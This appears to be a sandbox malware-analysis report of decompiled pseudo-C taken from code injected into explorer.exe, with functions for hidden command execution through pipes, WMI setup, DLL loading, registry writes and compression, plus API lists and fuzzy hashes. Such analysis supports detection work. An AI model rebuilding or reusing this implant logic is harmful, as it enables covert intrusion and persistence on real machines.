        								_t76 = E000C91E3(_v1112);
        								_t145 = _t130;
        								 *0xde740 = _t76;
        								 *0xde738 = E000C91E3(_t145);
        								L17:
        								_push(_t145);
        								_t188 = E000C9B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
        								_t201 = _t200 + 0x10;
        								__eflags = _t188;
        								if(_t188 == 0) {
        									goto L41;
        								}
        								_push(0xdb9ca);
        								E000C9F48(0xe);
        								E000C9F6C(_t188, _t208, _t130);
        								_t194 = _a4;
        								_v1096 = _v1096 & 0x00000000;
        								_push(2);
        								_v1100 =  *_t194;
        								_push(8);
        								_push( &_v1100);
        								_t178 = 0xb;
        								E000CA0AB(_t188, _t178, _t208);
        								_t179 =  *(_t194 + 0x10);
        								_t202 = _t201 + 0xc;
        								__eflags =  *(_t194 + 0x10);
        								if( *(_t194 + 0x10) != 0) {
        									E000CA3ED(_t188, _t179, _t208);
        								}
        								_t180 =  *(_t194 + 0xc);
        								__eflags = _t180;
        								if(_t180 != 0) {
        									E000CA3ED(_t188, _t180, _t208);
        								}
        								_t87 = E000C980C(0);
        								_push(2);
        								_v1100 = _t87;
        								_t153 = _t188;
        								_push(8);
        								_v1096 = _t180;
        								_push( &_v1100);
        								_t181 = 2;
        								_t89 = E000CA0AB(_t153, _t181, _t208);
        								_t203 = _t202 + 0xc;
        								__eflags = _v1108;
        								if(_v1108 == 0) {
        									_t153 =  *0xde688; // 0xf0000
        									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
        									if(__eflags != 0) {
        										_t90 = E000CFC1F(_t89, _t181, _t208, 0, _t130, 0);
        										_t203 = _t203 + 0xc;
        										goto L26;
        									}
        									_t153 = _t153 + 0x228;
        									goto L25;
        								} else {
        									_t91 =  *0xde688; // 0xf0000
        									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
        									if(__eflags != 0) {
        										L32:
        										__eflags =  *(_t91 + 0x1898) & 0x00000082;
        										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
        											_t183 = 0x64;
        											E000CE23E(_t183);
        										}
        										E000C52C0( &_v1076, _t208);
        										_t190 = _a8;
        										_t154 = _t153;
        										__eflags = _t190;
        										if(_t190 != 0) {
        											_t94 =  *0xde688; // 0xf0000
        											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
        											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
        												lstrcpyW(_t190, _t130);
        											} else {
        												_t96 = E000C109A(_t154, 0x228);
        												_v1100 = _t96;
        												lstrcpyW(_t190, _t96);
        												E000C85D5( &_v1100);
        												 *_t203 = "\"";
        												lstrcatW(_t190, ??);
        												lstrcatW(_t190, _t130);
        												lstrcatW(_t190, "\"");
        											}
        										}
        										_t93 = _a12;
        										__eflags = _t93;
        										if(_t93 != 0) {
        											 *_t93 = _v1104;
        										}
        										_t192 = 0;
        										__eflags = 0;
        										goto L41;
        									}
        									_t51 = _t91 + 0x228; // 0xf0228
        									_t153 = _t51;
        									L25:
        									_t90 = E000C553F(_t153, _t130, __eflags);
        									L26:
        									__eflags = _t90;
        									if(_t90 >= 0) {
        										_t91 =  *0xde688; // 0xf0000
        										goto L32;
        									}
        									_push(0xfffffffd);
        									L6:
        									_pop(_t192);
        									goto L41;
        								}
        							}
        							_t106 = E000CC292(_v1104, __eflags);
        							_v1112 = _t106;
        							_t107 =  *0xde684; // 0x280f8f0
        							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
        							__eflags = _t108 - _t192;
        							if(_t108 != _t192) {
        								_t109 =  *0xde684; // 0x280f8f0
        								 *((intOrPtr*)(_t109 + 0x30))();
        								E000C861A( &_v1148, _t192);
        								_t145 = _t108;
        								goto L17;
        							}
        							E000C861A( &_v1144, _t192);
        							_t81 = 1;
        							goto L42;
        						}
        						_t116 =  *(_t75 + 0x1898);
        						__eflags = _t116 & 0x00000004;
        						if((_t116 & 0x00000004) == 0) {
        							__eflags = _t116;
        							if(_t116 != 0) {
        								goto L12;
        							}
        							L11:
        							E000CE286(_v1112, _t175);
        							goto L12;
        						}
        						_v1080 = _v1080 & 0x00000000;
        						_t118 = E000C95E1(_t143, 0x879);
        						_v1100 = _t118;
        						_t175 = _t118;
        						E000CBFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
        						E000C85D5( &_v1100);
        						_t200 = _t200 + 0x14;
        						goto L11;
        					}
        					_push(0xfffffffe);
        					goto L6;
        				} else {
        					_t122 = E000C2BA4( &_v1044, _t192, 0x105);
        					_t206 = _t122;
        					if(_t122 == 0) {
        						L41:
        						_t81 = _t192;
        						L42:
        						return _t81;
        					}
        					goto L4;
        				}
        			}

        APIs
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: lstrcat$lstrcpy$memset
        • String ID:
        • API String ID: 1985475764-0
        • Opcode ID: 25e48525813f93615fde0145167042318559483661b4c5997eb0984318512aa9
        • Instruction ID: e00079e0afd43232e147177fe6b1363a575de2813d944f784ff1f94eb2fb20e0
        • Opcode Fuzzy Hash: 25e48525813f93615fde0145167042318559483661b4c5997eb0984318512aa9
        • Instruction Fuzzy Hash: BE91AC71604300AFE754EB20D896FBE73E9BB84720F14492EF9558B2D2EB74DD048B52
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • SysAllocString.OLEAUT32(00000000), ref: 000CD75C
        • SysAllocString.OLEAUT32(?), ref: 000CD764
        • SysAllocString.OLEAUT32(00000000), ref: 000CD778
        • SysFreeString.OLEAUT32(?), ref: 000CD7F3
        • SysFreeString.OLEAUT32(?), ref: 000CD7F6
        • SysFreeString.OLEAUT32(?), ref: 000CD7FB
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: String$AllocFree
        • String ID:
        • API String ID: 344208780-0
        • Opcode ID: 44420c4829f5bce14ab5226167260ede4167301a681125feba629d3f2e7185a8
        • Instruction ID: 3d9f34c9eecb127b5d7570106aa8ec4b723249f91a2853b660b7b91b34ec35e3
        • Opcode Fuzzy Hash: 44420c4829f5bce14ab5226167260ede4167301a681125feba629d3f2e7185a8
        • Instruction Fuzzy Hash: 5A21F875900218BFDB10DFA5CC88DAFBBBDEF48354B1044AAF505A7250EA71AE01CB60
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID:
        • String ID: @$\u%04X$\u%04X\u%04X
        • API String ID: 0-2132903582
        • Opcode ID: 5c4a3dcad14d073debbc25b81825f3e4875a0567a15792a86c44d49d2579c3be
        • Instruction ID: 3547e2d1494ab77912d377d0d288dcf2f58bd85626a5821c1112c12d5c5f1659
        • Opcode Fuzzy Hash: 5c4a3dcad14d073debbc25b81825f3e4875a0567a15792a86c44d49d2579c3be
        • Instruction Fuzzy Hash: C5412C31600305A7EF785A68CC69BFEAA98DF84350F240027F98DD6356D661CD9197F1
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 30%
        			E000CD523(void* __ecx) {
        				char _v8;
        				void* _v12;
        				char* _t15;
        				intOrPtr* _t16;
        				void* _t21;
        				intOrPtr* _t23;
        				intOrPtr* _t24;
        				intOrPtr* _t25;
        				void* _t30;
        				void* _t33;
        
        				_v12 = 0;
        				_v8 = 0;
        				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
        				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
        				_t15 =  &_v12;
        				__imp__CoCreateInstance(0xdb848, 0, 1, 0xdb858, _t15);
        				if(_t15 < 0) {
        					L5:
        					_t23 = _v8;
        					if(_t23 != 0) {
        						 *((intOrPtr*)( *_t23 + 8))(_t23);
        					}
        					_t24 = _v12;
        					if(_t24 != 0) {
        						 *((intOrPtr*)( *_t24 + 8))(_t24);
        					}
        					_t16 = 0;
        				} else {
        					__imp__#2(__ecx);
        					_t25 = _v12;
        					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
        					if(_t21 < 0) {
        						goto L5;
        					} else {
        						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
        						if(_t21 < 0) {
        							goto L5;
        						} else {
        							_t16 = E000C8604(8);
        							if(_t16 == 0) {
        								goto L5;
        							} else {
        								 *((intOrPtr*)(_t16 + 4)) = _v12;
        								 *_t16 = _v8;
        							}
        						}
        					}
        				}
        				return _t16;
        			}

        APIs
        • CoInitializeEx.OLE32(00000000,00000000), ref: 000CD536
        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000CD547
        • CoCreateInstance.OLE32(000DB848,00000000,00000001,000DB858,?), ref: 000CD55E
        • SysAllocString.OLEAUT32(00000000), ref: 000CD569
        • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 000CD594
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
        • String ID:
        • API String ID: 1610782348-0
        • Opcode ID: 05ab0c0f64f303f71bbde7eec5c3099c89def3f6aef423da56ef5a12d5b49738
        • Instruction ID: b52495c3964bc2eee305646e62cfc807d5bb65c34ee2dbb5966ceb0035954956
        • Opcode Fuzzy Hash: 05ab0c0f64f303f71bbde7eec5c3099c89def3f6aef423da56ef5a12d5b49738
        • Instruction Fuzzy Hash: 3821EA74601245BFEB249B66DC4DE6FBFBCEFC6B15F10416EB901A6290DA709A01CB30
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 79%
        			E000D21FF(char* __eax, char** _a4, long long* _a8) {
        				char* _v8;
        				long long _v16;
        				char* _t9;
        				signed char _t11;
        				char** _t19;
        				char _t22;
        				long long _t32;
        				long long _t33;
        
        				_t9 = __eax;
        				L000D22CD();
        				_t19 = _a4;
        				_t22 =  *__eax;
        				if( *_t22 != 0x2e) {
        					_t9 = strchr( *_t19, 0x2e);
        					if(_t9 != 0) {
        						 *_t9 =  *_t22;
        					}
        				}
        				L000D2291();
        				 *_t9 =  *_t9 & 0x00000000;
        				_t11 = strtod( *_t19,  &_v8);
        				asm("fst qword [ebp-0xc]");
        				_t32 =  *0xd8250;
        				asm("fucomp st1");
        				asm("fnstsw ax");
        				if((_t11 & 0x00000044) != 0) {
        					L5:
        					st0 = _t32;
        					L000D2291();
        					if( *_t11 != 0x22) {
        						_t33 = _v16;
        						goto L8;
        					} else {
        						return _t11 | 0xffffffff;
        					}
        				} else {
        					_t33 =  *0xd8258;
        					asm("fucomp st1");
        					asm("fnstsw ax");
        					if((_t11 & 0x00000044) != 0) {
        						L8:
        						 *_a8 = _t33;
        						return 0;
        					} else {
        						goto L5;
        					}
        				}
        			}

        APIs
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: _errno$localeconvstrchrstrtod
        • String ID:
        • API String ID: 1035490122-0
        • Opcode ID: aceb4110dc66301c355acdaa5611ac5f99a5334a39e134f6b0ec4c9c9ba2d16c
        • Instruction ID: 02ad6d30cf94f535e5970a8dc70227cda6efb6bc9110fd6e31c748a412764503
        • Opcode Fuzzy Hash: aceb4110dc66301c355acdaa5611ac5f99a5334a39e134f6b0ec4c9c9ba2d16c
        • Instruction Fuzzy Hash: A7012435804305FADB122F25E9026FD3BA4AFAA360F2041C2F980672A2CB358854DBB4
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 73%
        			E000CA9B7(signed int __ecx) {
        				void* _v8;
        				void* _v12;
        				void* _v16;
        				void* _v20;
        				signed int _v24;
        				char _v28;
        				char _v32;
        				char _v36;
        				struct _SECURITY_ATTRIBUTES _v48;
        				intOrPtr _v60;
        				char _v64;
        				intOrPtr _v76;
        				intOrPtr _v80;
        				void* _v84;
        				short _v92;
        				intOrPtr _v96;
        				void _v140;
        				intOrPtr _t77;
        				void* _t79;
        				intOrPtr _t85;
        				intOrPtr _t87;
        				intOrPtr _t89;
        				intOrPtr _t92;
        				intOrPtr _t98;
        				intOrPtr _t100;
        				intOrPtr _t102;
        				long _t111;
        				intOrPtr _t115;
        				intOrPtr _t126;
        				void* _t127;
        				void* _t128;
        				void* _t129;
        				void* _t130;
        
        				_t111 = 0;
        				_v24 = __ecx;
        				_v12 = 0;
        				_v20 = 0;
        				_t127 = 0;
        				_v8 = 0;
        				_v16 = 0;
        				_v48.nLength = 0xc;
        				_v48.lpSecurityDescriptor = 0;
        				_v48.bInheritHandle = 1;
        				_v28 = 0;
        				memset( &_v140, 0, 0x44);
        				asm("stosd");
        				_t130 = _t129 + 0xc;
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
        					L18:
        					return 0;
        				}
        				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
        					L13:
        					E000C861A( &_v28, 0);
        					if(_v20 != 0) {
        						_t77 =  *0xde684; // 0x280f8f0
        						 *((intOrPtr*)(_t77 + 0x30))(_v20);
        					}
        					if(_v8 != 0) {
        						_t115 =  *0xde684; // 0x280f8f0
        						 *((intOrPtr*)(_t115 + 0x30))(_v8);
        					}
        					return _t111;
        				}
        				_t79 = _v16;
        				_v76 = _t79;
        				_v80 = _t79;
        				_v84 = _v12;
        				_v140 = 0x44;
        				_v96 = 0x101;
        				_v92 = 0;
        				_t126 = E000C8604(0x1001);
        				_v28 = _t126;
        				if(_t126 == 0) {
        					goto L18;
        				}
        				_push( &_v64);
        				_push( &_v140);
        				_t85 =  *0xde684; // 0x280f8f0
        				_push(0);
        				_push(0);
        				_push(0x8000000);
        				_push(1);
        				_push(0);
        				_push(0);
        				_push(_v24);
        				_push(0);
        				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
        					goto L13;
        				}
        				_t87 =  *0xde684; // 0x280f8f0
        				 *((intOrPtr*)(_t87 + 0x30))(_v12);
        				_t89 =  *0xde684; // 0x280f8f0
        				 *((intOrPtr*)(_t89 + 0x30))(_v16);
        				_v24 = _v24 & 0;
        				do {
        					_t92 =  *0xde684; // 0x280f8f0
        					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
        					 *((char*)(_v24 + _t126)) = 0;
        					if(_t111 == 0) {
        						_t127 = E000C91A6(_t126, 0);
        					} else {
        						_push(0);
        						_push(_t126);
        						_v32 = _t127;
        						_t127 = E000C9292(_t127);
        						E000C861A( &_v32, 0xffffffff);
        						_t130 = _t130 + 0x14;
        					}
        					_t111 = _t127;
        					_v32 = _t127;
        				} while (_v36 != 0);
        				_push( &_v36);
        				_push(E000CC379(_t127));
        				_t98 =  *0xde68c; // 0x280fab8
        				_push(_t127);
        				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
        					L12:
        					_t100 =  *0xde684; // 0x280f8f0
        					 *((intOrPtr*)(_t100 + 0x30))(_v64);
        					_t102 =  *0xde684; // 0x280f8f0
        					 *((intOrPtr*)(_t102 + 0x30))(_v60);
        					goto L13;
        				}
        				_t128 = E000C9256(_t127);
        				if(_t128 == 0) {
        					goto L12;
        				}
        				E000C861A( &_v32, 0);
        				return _t128;
        			}

        APIs
        • memset.MSVCRT ref: 000CA9F4
        • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 000CAA18
        • CreatePipe.KERNEL32(000C65A9,?,0000000C,00000000), ref: 000CAA2F
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
          • Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateHeapPipe$AllocateFreememset
        • String ID: D
        • API String ID: 2365139273-2746444292
        • Opcode ID: 9a2e551b63c43dc9543f3e7ae316adbf9ccf312437153ee1b23a49d91da7ae79
        • Instruction ID: ee5a40d96a8d170e39ef4db7aa177635ee1e57970e24f23723ed2304e9932c98
        • Opcode Fuzzy Hash: 9a2e551b63c43dc9543f3e7ae316adbf9ccf312437153ee1b23a49d91da7ae79
        • Instruction Fuzzy Hash: 69512972E00209AFEB51DFA4CC85FEEB7B9EB08304F10416AF504E7292DB749E048B65
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 89%
        			E000CC4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
        				char _v8;
        				char _v12;
        				void _v140;
        				signed char _t14;
        				char _t15;
        				intOrPtr _t20;
        				void* _t25;
        				intOrPtr _t26;
        				intOrPtr _t32;
        				WCHAR* _t34;
        				intOrPtr _t35;
        				struct HINSTANCE__* _t37;
        				int _t38;
        				intOrPtr _t46;
        				void* _t47;
        				intOrPtr _t50;
        				void* _t60;
        				void* _t61;
        				char _t62;
        				char* _t63;
        				void* _t65;
        				intOrPtr _t66;
        				char _t68;
        
        				_t65 = __esi;
        				_t61 = __edi;
        				_t47 = __ebx;
        				_t50 =  *0xde688; // 0xf0000
        				_t14 =  *(_t50 + 0x1898);
        				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
        					_t15 = E000C95E1(_t50, 0xb62);
        					_t66 =  *0xde688; // 0xf0000
        					_t62 = _t15;
        					_t67 = _t66 + 0xb0;
        					_v8 = _t62;
        					E000C9640( &_v140, 0x40, L"%08x", E000CD400(_t66 + 0xb0, E000CC379(_t66 + 0xb0), 0));
        					_t20 =  *0xde688; // 0xf0000
        					asm("sbb eax, eax");
        					_t25 = E000C95E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
        					_t63 = "\\";
        					_t26 =  *0xde688; // 0xf0000
        					_t68 = E000C92E5(_t26 + 0x1020);
        					_v12 = _t68;
        					E000C85D5( &_v8);
        					_t32 =  *0xde688; // 0xf0000
        					_t34 = E000C92E5(_t32 + 0x122a);
        					 *0xde784 = _t34;
        					_t35 =  *0xde684; // 0x280f8f0
        					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
        					_t37 = LoadLibraryW( *0xde784);
        					 *0xde77c = _t37;
        					if(_t37 == 0) {
        						_t38 = 0;
        					} else {
        						_push(_t37);
        						_t60 = 0x28;
        						_t38 = E000CE171(0xdbb48, _t60);
        					}
        					 *0xde780 = _t38;
        					E000C861A( &_v12, 0xfffffffe);
        					memset( &_v140, 0, 0x80);
        					if( *0xde780 != 0) {
        						goto L10;
        					} else {
        						E000C861A(0xde784, 0xfffffffe);
        						goto L8;
        					}
        				} else {
        					L8:
        					if( *0xde780 == 0) {
        						_t46 =  *0xde6bc; // 0x280fa18
        						 *0xde780 = _t46;
        					}
        					L10:
        					return 1;
        				}
        			}

        APIs
        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: LibraryLoadmemset
        • String ID: %08x$dll
        • API String ID: 3406617148-2963171978
        • Opcode ID: 8d6fcf7fea274a47f8b53a85a2f9067f36f6f00f3362a28de413877c87709e25
        • Instruction ID: 7bb140d26ea90620d688a4d55edfb562bb055213326fc88d9619b145c98fbc54
        • Opcode Fuzzy Hash: 8d6fcf7fea274a47f8b53a85a2f9067f36f6f00f3362a28de413877c87709e25
        • Instruction Fuzzy Hash: A7319572A01244ABFB50AB64DC89F9E33ACEB54354F14402FF909DB292DB78D9458734
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 99%
        			E000D2D70(int _a4, signed int _a8) {
        				int _v8;
        				intOrPtr _v12;
        				signed int _v16;
        				void* __esi;
        				void* _t137;
        				signed int _t141;
        				intOrPtr* _t142;
        				signed int _t145;
        				signed int _t146;
        				intOrPtr _t151;
        				intOrPtr _t161;
        				intOrPtr _t162;
        				intOrPtr _t167;
        				intOrPtr _t170;
        				signed int _t172;
        				intOrPtr _t173;
        				int _t184;
        				intOrPtr _t185;
        				intOrPtr _t188;
        				signed int _t189;
        				void* _t195;
        				int _t202;
        				int _t208;
        				intOrPtr _t217;
        				signed int _t218;
        				int _t219;
        				intOrPtr _t220;
        				signed int _t221;
        				signed int _t222;
        				int _t224;
        				int _t225;
        				signed int _t227;
        				intOrPtr _t228;
        				int _t232;
        				int _t234;
        				signed int _t235;
        				int _t239;
        				void* _t240;
        				int _t245;
        				int _t252;
        				signed int _t253;
        				int _t254;
        				void* _t257;
        				void* _t258;
        				int _t259;
        				intOrPtr _t260;
        				int _t261;
        				signed int _t269;
        				signed int _t271;
        				intOrPtr* _t272;
        				void* _t273;
        
        				_t253 = _a8;
        				_t272 = _a4;
        				_t3 = _t272 + 0xc; // 0x452bf84d
        				_t4 = _t272 + 0x2c; // 0x8df075ff
        				_t228 =  *_t4;
        				_t137 =  *_t3 + 0xfffffffb;
        				_t229 =  <=  ? _t137 : _t228;
        				_v16 =  <=  ? _t137 : _t228;
        				_t269 = 0;
        				_a4 =  *((intOrPtr*)( *_t272 + 4));
        				asm("o16 nop [eax+eax]");
        				while(1) {
        					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
        					_t141 =  *_t8 + 0x2a >> 3;
        					_v12 = 0xffff;
        					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
        					if(_t217 < _t141) {
        						break;
        					}
        					_t11 = _t272 + 0x6c; // 0xa1ec8b55
        					_t12 = _t272 + 0x5c; // 0x84e85000
        					_t245 =  *_t11 -  *_t12;
        					_v8 = _t245;
        					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
        					_t247 =  <  ? _t195 : _v12;
        					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
        					if(_t227 >= _v16) {
        						L7:
        						if(_t253 != 4) {
        							L10:
        							_t269 = 0;
        							__eflags = 0;
        						} else {
        							_t285 = _t227 - _t195;
        							if(_t227 != _t195) {
        								goto L10;
        							} else {
        								_t269 = _t253 - 3;
        							}
        						}
        						E000D5D90(_t272, _t272, 0, 0, _t269);
        						_t18 = _t272 + 0x14; // 0xc703f045
        						_t19 = _t272 + 8; // 0x8d000040
        						 *( *_t18 +  *_t19 - 4) = _t227;
        						_t22 = _t272 + 0x14; // 0xc703f045
        						_t23 = _t272 + 8; // 0x8d000040
        						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
        						_t26 = _t272 + 0x14; // 0xc703f045
        						_t27 = _t272 + 8; // 0x8d000040
        						 *( *_t26 +  *_t27 - 2) =  !_t227;
        						_t30 = _t272 + 0x14; // 0xc703f045
        						_t31 = _t272 + 8; // 0x8d000040
        						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
        						E000D4AF0(_t285,  *_t272);
        						_t202 = _v8;
        						_t273 = _t273 + 0x14;
        						if(_t202 != 0) {
        							_t208 =  >  ? _t227 : _t202;
        							_v8 = _t208;
        							_t36 = _t272 + 0x38; // 0xf47d8bff
        							_t37 = _t272 + 0x5c; // 0x84e85000
        							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
        							_t273 = _t273 + 0xc;
        							_t252 = _v8;
        							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
        							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
        							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
        							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
        							_t227 = _t227 - _t252;
        						}
        						if(_t227 != 0) {
        							E000D4C30( *_t272,  *( *_t272 + 0xc), _t227);
        							_t273 = _t273 + 0xc;
        							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
        							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
        							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
        						}
        						_t253 = _a8;
        						if(_t269 == 0) {
        							continue;
        						}
        					} else {
        						if(_t227 != 0 || _t253 == 4) {
        							if(_t253 != 0 && _t227 == _t195) {
        								goto L7;
        							}
        						}
        					}
        					break;
        				}
        				_t142 =  *_t272;
        				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
        				_a4 = _t232;
        				if(_t232 == 0) {
        					_t83 = _t272 + 0x6c; // 0xa1ec8b55
        					_t254 =  *_t83;
        				} else {
        					_t59 = _t272 + 0x2c; // 0x8df075ff
        					_t224 =  *_t59;
        					if(_t232 < _t224) {
        						_t65 = _t272 + 0x3c; // 0x830cc483
        						_t66 = _t272 + 0x6c; // 0xa1ec8b55
        						_t260 =  *_t66;
        						__eflags =  *_t65 - _t260 - _t232;
        						if( *_t65 - _t260 <= _t232) {
        							_t67 = _t272 + 0x38; // 0xf47d8bff
        							_t261 = _t260 - _t224;
        							 *(_t272 + 0x6c) = _t261;
        							memcpy( *_t67,  *_t67 + _t224, _t261);
        							_t70 = _t272 + 0x16b0; // 0xdf750008
        							_t188 =  *_t70;
        							_t273 = _t273 + 0xc;
        							_t232 = _a4;
        							__eflags = _t188 - 2;
        							if(_t188 < 2) {
        								_t189 = _t188 + 1;
        								__eflags = _t189;
        								 *(_t272 + 0x16b0) = _t189;
        							}
        						}
        						_t73 = _t272 + 0x38; // 0xf47d8bff
        						_t74 = _t272 + 0x6c; // 0xa1ec8b55
        						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
        						_t225 = _a4;
        						_t273 = _t273 + 0xc;
        						_t76 = _t272 + 0x6c;
        						 *_t76 =  *(_t272 + 0x6c) + _t225;
        						__eflags =  *_t76;
        						_t78 = _t272 + 0x6c; // 0xa1ec8b55
        						_t184 =  *_t78;
        						_t79 = _t272 + 0x2c; // 0x8df075ff
        						_t239 =  *_t79;
        					} else {
        						 *(_t272 + 0x16b0) = 2;
        						_t61 = _t272 + 0x38; // 0xf47d8bff
        						memcpy( *_t61,  *_t142 - _t224, _t224);
        						_t62 = _t272 + 0x2c; // 0x8df075ff
        						_t184 =  *_t62;
        						_t273 = _t273 + 0xc;
        						_t225 = _a4;
        						_t239 = _t184;
        						 *(_t272 + 0x6c) = _t184;
        					}
        					_t254 = _t184;
        					 *(_t272 + 0x5c) = _t184;
        					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
        					_t185 =  *_t81;
        					_t240 = _t239 - _t185;
        					_t241 =  <=  ? _t225 : _t240;
        					_t242 = ( <=  ? _t225 : _t240) + _t185;
        					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
        				}
        				if( *(_t272 + 0x16c0) < _t254) {
        					 *(_t272 + 0x16c0) = _t254;
        				}
        				if(_t269 == 0) {
        					_t218 = _a8;
        					__eflags = _t218;
        					if(_t218 == 0) {
        						L34:
        						_t89 = _t272 + 0x3c; // 0x830cc483
        						_t219 =  *_t272;
        						_t145 =  *_t89 - _t254 - 1;
        						_a4 =  *_t272;
        						_t234 = _t254;
        						_v16 = _t145;
        						_v8 = _t254;
        						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
        						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
        							_v8 = _t254;
        							_t95 = _t272 + 0x5c; // 0x84e85000
        							_a4 = _t219;
        							_t234 = _t254;
        							_t97 = _t272 + 0x2c; // 0x8df075ff
        							__eflags =  *_t95 -  *_t97;
        							if( *_t95 >=  *_t97) {
        								_t98 = _t272 + 0x2c; // 0x8df075ff
        								_t167 =  *_t98;
        								_t259 = _t254 - _t167;
        								_t99 = _t272 + 0x38; // 0xf47d8bff
        								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
        								 *(_t272 + 0x6c) = _t259;
        								memcpy( *_t99, _t167 +  *_t99, _t259);
        								_t103 = _t272 + 0x16b0; // 0xdf750008
        								_t170 =  *_t103;
        								_t273 = _t273 + 0xc;
        								__eflags = _t170 - 2;
        								if(_t170 < 2) {
        									_t172 = _t170 + 1;
        									__eflags = _t172;
        									 *(_t272 + 0x16b0) = _t172;
        								}
        								_t106 = _t272 + 0x2c; // 0x8df075ff
        								_t145 = _v16 +  *_t106;
